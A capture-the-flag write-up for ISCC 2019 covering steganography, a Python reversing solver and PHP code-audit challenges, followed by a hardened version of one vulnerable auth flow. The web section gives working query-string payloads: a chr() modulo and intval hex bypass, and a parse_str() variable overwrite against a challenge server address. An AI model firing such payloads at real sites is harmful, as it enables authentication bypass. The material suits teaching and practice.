iscc2019


misc

welcome

Add the .zip extension and open the file, then replace "蓅烺計劃 洮蓠朩暒" with 0 and "戶囗 萇條" with 1. This yields the binary string 011001100110110001100001011001110111101101001001010100110100001101000011010111110101011101000101010011000100001101001111010011010100010101111101

Convert it to ASCII.

The result is flag{ISCC_WELCOME}

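The most dangerous place is the safest place

Open the downloaded image in WinHex. A zip file is hidden inside it: search for 504B0304, copy the selected block into a new file and open it to find 50 images. The last image's Properties -> Details tab holds a base64 string: ZmxhZ3sxNWNDOTAxMn0=

Decoding it gives flag{15cC9012}. There is one last twist: when submitting, submit only the part inside the braces.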

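The exe that won't run

Opening the file in Notepad++ reveals a string of characters.

At http://www.tomeko.net/online_tools/base64.php?lang=en, convert the string into a .dat file. Opening that file in WinHex shows "png" in the text pane on the right of the header, but the hex values on the left are wrong (they should be 89 50 4E 47 0D 0A 1A 0A). Fix them, change the extension to .png and open the file: it is a QR code, and scanning it gives the flag.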

Aesop’s secret

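After downloading and extracting, you get a GIF image. Open it in Notepad and look at the end of the file for the string U2FsdGVkX19QwGkcgD0fTjZxgijRzQOGbCWALh4sRDec2w6xsY/ux53Vuj/AMZBDJ87qyZL5kAf1fmAH4Oe13Iu435bfRBuZgHpnRjTBn5+xsDHONiR3t0+Oa8yG/tOKJMNUauedvMyN4v4QKiFunw==

This looks like AES encryption, and the password is guessed to be ISCC.

Decrypting twice gives the flag.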

https://zhuanlan.zhihu.com/p/30323085

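Can they be together?

The file is a QR code; scanning it gives UEFTUyU3QjBLX0lfTDBWM19ZMHUlMjElN0Q=

Base64-decode it and then URL-decode the result to get PASS{0K_I_L0V3_Y0u!}

That does not match the flag format, so keep looking.

Open the QR code image in WinHex. At the very end is the text "you won’t wanner .txt", which suggests an embedded zip file. Search for the hex value 504b0304 (the zip file header) and carve out the selected block to get an encrypted archive. The password is the string obtained from the QR code earlier. The flag is ISCC{S0rrY_W3_4R3_Ju5T_Fr1END}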

reverse

Simple Python

Decompile it online

```python
# Python 2 source as recovered by the online decompiler
import base64


def encode(message):
    s = ''
    for i in message:
        x = ord(i) ^ 32   # XOR each character code with 32
        x = x + 16        # then add 16
        s += chr(x)

    return base64.b64encode(s)


correct = 'eYNzc2tjWV1gXFWPYGlTbQ=='
flag = ''
print 'Input flag:'
flag = raw_input()
if encode(flag) == correct:
    print 'correct'
else:
    print 'wrong'
```


The logic is straightforward: base64-decode correct, subtract 16 from the ASCII value of each character, then XOR the result with 32 to recover the flag.

exp

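```python
# Solver (Python 3)
import base64

correct = 'eYNzc2tjWV1gXFWPYGlTbQ=='

s = base64.b64decode(correct)  # bytes; iterating yields integers

flag = ''
for b in s:
    # undo encode(): subtract 16 first, then XOR with 32
    flag += chr((b - 16) ^ 32)
print(flag)
```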

web

web1

PHP code audit


```php
<?php
error_reporting(0);
require 'flag.php';
$value = $_GET['value'];
$password = $_GET['password'];
$username = '';

for ($i = 0; $i < count($value); ++$i) {
    // any element in the range 33..126 is rejected
    if ($value[$i] > 32 && $value[$i] < 127) unset($value);
    // chr() reduces its argument modulo 256
    else $username .= chr($value[$i]);
    if ($username == 'w3lc0me_To_ISCC2019' && intval($password) < 2333 && intval($password + 1) > 2333) {
        echo 'Hello '.$username.'!', "\n", PHP_EOL;
        echo $flag, "\n";
    }
}
highlight_file(__FILE__);
```

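A few tricks are needed:

1. chr() takes its argument modulo 256, so adding 256 to each value gets past the if check.

2. intval() mishandles hexadecimal strings, whereas the implicit type conversion (as in $password + 1) handles them normally.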

payload

value[0]=375&value[1]=307&value[2]=364&value[3]=355&value[4]=304&value[5]=365&value[6]=357&value[7]=351&value[8]=340&value[9]=367&value[10]=351&value[11]=329&value[12]=339&value[13]=323&value[14]=323&value[15]=306&value[16]=304&value[17]=305&value[18]=313&password=0x1233

web4

 
```php
<?php
error_reporting(0);
include("flag.php");
$hashed_key = 'ddbafb4eb89e218701472d3f6c087fdf7119dfdd560f9d1fcbe7482b0feea05a';
$parsed = parse_url($_SERVER['REQUEST_URI']);
if(isset($parsed["query"])){
    $query = $parsed["query"];
    $parsed_query = parse_str($query); // allows variable overwriting
    if($parsed_query!=NULL){
        $action = $parsed_query['action'];
    }

    if($action==="auth"){
        $key = $_GET["key"];
        $hashed_input = hash('sha256', $key);
        if($hashed_input!==$hashed_key){
            die("");
        }

        echo $flag;
    }
}else{
    show_source(__FILE__);
}
?>
```

payload: 39.100.83.188:8066/?hashed_key=1eb79602411ef02cf6fe117897015fff89f80face4eccd50425c45149b148408&action=auth&key=this

Variable overwriting is used to replace the value of hashed_key with the SHA-256 hash of key.
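The same auth flow with the overwrite closed, as an added example that is not part of the original write-up or the challenge: parse_str() is given a result array so query parameters cannot replace local variables such as $hashed_key, and the digests are compared with hash_equals(). The function name is_authorized and the demo key are assumptions made for illustration.

```php
<?php
// Added example, not the challenge's code.
// DEMO_KEY is a constructed value; the challenge's real key is not on the page.
const DEMO_KEY = 'constructed-demo-key';

function is_authorized(string $requestUri, string $expectedHash): bool
{
    $query = parse_url($requestUri, PHP_URL_QUERY);
    if (!is_string($query)) {
        return false;                 // no query string, or unparsable URI
    }

    // Two-argument form: values land in $params, never in the local scope,
    // so ?hashed_key=... cannot replace $expectedHash.
    parse_str($query, $params);

    $action = $params['action'] ?? null;
    $key    = $params['key'] ?? null;
    if ($action !== 'auth' || !is_string($key)) {
        return false;                 // also rejects array input such as key[]=x
    }

    // Constant-time comparison of the two hex digests.
    return hash_equals($expectedHash, hash('sha256', $key));
}

$expected = hash('sha256', DEMO_KEY);

// Query string from the write-up: the supplied hashed_key is simply ignored.
$overwrite = '/?hashed_key=1eb79602411ef02cf6fe117897015fff89f80face4eccd50425c45149b148408'
           . '&action=auth&key=this';

var_dump(is_authorized($overwrite, $expected));
var_dump(is_authorized('/?action=auth&key=' . DEMO_KEY, $expected));
var_dump(is_authorized('/?action=auth&key[]=x', $expected));
```

The one-argument parse_str() call used by the challenge was deprecated in PHP 7.2, and since PHP 8.0 the result argument is required.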
